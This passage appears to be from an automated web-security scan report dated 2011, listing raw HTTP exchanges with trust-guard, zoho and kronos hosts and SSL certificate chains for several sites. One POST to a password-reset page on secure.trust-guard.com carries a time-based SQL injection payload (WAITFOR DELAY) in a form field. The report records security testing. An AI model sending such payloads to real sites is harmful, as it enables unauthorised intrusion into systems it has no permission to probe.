Path:   /m2/kronos/mbox/standard

Request

GET /m2/kronos/mbox/standard?mboxHost=www.kronos.com&mboxSession=1303738433760-48782&mboxPage=1303739507367-90386&screenHeight=1200&screenWidth=1920&browserWidth=1125&browserHeight=981&browserTimeOffset=-300&colorDepth=16&mboxCount=1&param1=test%2Cparam2%3Dtest&mbox=Button_cta_right_rail&mboxId=0&mboxTime=1303721507457&mboxURL=http%3A%2F%2Fwww.kronos.com%2Fkronos-site-usage-privacy-policy.aspx&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: kronos.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.kronos.com/kronos-site-usage-privacy-policy.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 102
Date: Mon, 25 Apr 2011 13:51:37 GMT
Server: Test & Target

mboxFactories.get('default').get('Button_cta_right_rail',0).setOffer(new mboxOfferDefault()).loaded();
36.5. http://partner-support.wiki.zoho.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://partner-support.wiki.zoho.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: partner-support.wiki.zoho.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: zwcsrfcki=dcebcee0-6d9d-446f-8e91-6618ac1b7fdd; JSESSIONID=D42EBA6A1D444AECC44D46E1F5687ABF

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
ETag: W/"1150-1301472610000"
Last-Modified: Wed, 30 Mar 2011 08:10:10 GMT
Content-Length: 1150
Date: Mon, 25 Apr 2011 12:15:20 GMT
Server: Apache-Coyote/1.1

............ .h.......(....... ..... ...........................C...C...B...C...C...C...C...B...C...C...B...C...C...C...C...C...G...G...F...F...G...F...F...F...G...G...G...F...F...F...F...F...J...J...
...[SNIP]...
36.6. https://secure.trust-guard.com/ResetPassword.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /ResetPassword.php

Request

POST /ResetPassword.php HTTP/1.1
Referer: https://secure.trust-guard.com/ResetPassword.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.trust-guard.com
Cookie: PHPSESSID=sjhj47er2168q391qsf989a724
Expect: 100-continue
Accept-Encoding: gzip, deflate
Content-Length: 97

btnCancel=%27;WAITFOR%20DELAY%20%270:0:25%27--&btnSubmit=Submit&txtEmail=netsparker%40example.com

Response

HTTP/1.1 100 Continue

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:00:10 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check
...[SNIP]...
36.7. https://support.trust-guard.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /index.php

Request

POST /index.php HTTP/1.1
Referer: https://support.trust-guard.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Expect: 100-continue
Accept-Encoding: gzip, deflate
Content-Length: 61

searchquery=&searchtype=knowledgebase&_m=core&_a=searchclient

Response

HTTP/1.1 100 Continue

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:59:27 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 56562


   <!DOCTYPE HTML PUBLIC "-//W3C//D
...[SNIP]...
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
...[SNIP]...
36.8. https://support.trust-guard.com/visitor/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor/index.php

Request

POST /visitor/index.php HTTP/1.1
Referer: https://support.trust-guard.com/visitor/index.php?_m=livesupport&_a=chatstartcontentframe&sessionid=&departmentid=0&fullname=&email=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Expect: 100-continue
Accept-Encoding: gzip, deflate
Content-Length: 74

departmentid=3&fullname=&email=&_m=livesupport&_a=startformchat&sessionid=

Response

HTTP/1.1 100 Continue

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:00:25 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 2070

<html>
<head>
<title>Trust Guard -
...[SNIP]...
</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<!-- default stylesheet -->
...[SNIP]...
37. SSL certificate  previous
There are 10 instances of this issue:

37.1. https://checkout.netsuite.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  checkout.netsuite.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Wed Jul 08 19:00:00 CDT 2009
Valid to:  Sat Jul 09 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028
37.2. https://forms.netsuite.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://forms.netsuite.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.netsuite.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Thu Jan 07 17:22:23 CST 2010
Valid to:  Mon Jan 07 17:22:23 CST 2013

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Thu Jun 29 12:06:20 CDT 2034
37.3. https://secure.trust-guard.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.trust-guard.com
Issued by:  Equifax Secure Global eBusiness CA-1
Valid from:  Thu Oct 23 09:21:27 CDT 2008
Valid to:  Tue Oct 23 09:21:27 CDT 2012

Certificate chain #1

Issued to:  Equifax Secure Global eBusiness CA-1
Issued by:  Equifax Secure Global eBusiness CA-1
Valid from:  Sun Jun 20 23:00:00 CDT 1999
Valid to:  Sat Jun 20 23:00:00 CDT 2020
37.4. https://store.manageengine.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.manageengine.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  store.manageengine.com
Issued by:  GeoTrust Extended Validation SSL CA
Valid from:  Mon Jan 11 17:11:42 CST 2010
Valid to:  Fri Jan 13 20:12:48 CST 2012

Certificate chain #1

Issued to:  GeoTrust Extended Validation SSL CA
Issued by:  GeoTrust Primary Certification Authority
Valid from:  Tue Nov 28 18:00:00 CST 2006
Valid to:  Mon Nov 28 17:59:59 CST 2016

Certificate chain #2

Issued to:  GeoTrust Primary Certification Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Tue Nov 28 10:08:31 CST 2006
Valid to:  Tue Aug 21 10:08:31 CDT 2018

Certificate chain #3

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018
37.5. https://support.comodo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.comodo.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  support.comodo.com
Issued by:  COMODO EV SGC CA
Valid from:  Sun Aug 02 19:00:00 CDT 2009
Valid to:  Wed Aug 03 18:59:59 CDT 2011

Certificate chain #1

Issued to:  COMODO EV SGC CA
Issued by:  COMODO Certification Authority
Valid from:  Thu Nov 30 18:00:00 CST 2006
Valid to:  Tue Dec 31 17:59:59 CST 2019

Certificate chain #2

Issued to:  COMODO Certification Authority
Issued by:  UTN - DATACorp SGC
Valid from:  Thu Nov 30 18:00:00 CST 2006
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:  UTN - DATACorp SGC
Issued by:  AddTrust External CA Root
Valid from:  Tue Jun 07 03:09:10 CDT 2005
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #4

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020
37.6. https://support.trust-guard.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  support.trust-guard.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Tue Feb 02 05:30:20 CST 2010
Valid to:  Mon Feb 02 18:24:48 CST 2015

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018
37.7. https://system.netsuite.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://system.netsuite.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  system.netsuite.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Wed Jul 08 19:00:00 CDT 2009
Valid to:  Sat Jul 09 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028
37.8. https://www.manageengine.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.manageengine.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.manageengine.com
Issued by:  RapidSSL CA
Valid from:  Mon Mar 14 03:35:25 CDT 2011
Valid to:  Tue May 15 23:54:57 CDT 2012

Certificate chain #1

Issued to:  RapidSSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 19 16:45:05 CST 2010
Valid to:  Tue Feb 18 16:45:05 CST 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 23:00:00 CDT 2002
Valid to:  Fri May 20 23:00:00 CDT 2022
37.9. https://www.salesforce.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.salesforce.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.salesforce.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Thu Jun 11 19:00:00 CDT 2009
Valid to:  Wed Jul 20 18:59:59 CDT 2011

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2011

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028
37.10. https://www.trust-guard.com/  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trust-guard.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.trust-guard.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Wed Apr 21 09:33:31 CDT 2010
Valid to:  Sun Apr 21 09:33:31 CDT 2013

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  http://www.valicert.com/
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

Certificate chain #4

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019
Report generated by XSS.CX at Tue Apr 26 12:49:31 CDT 2011.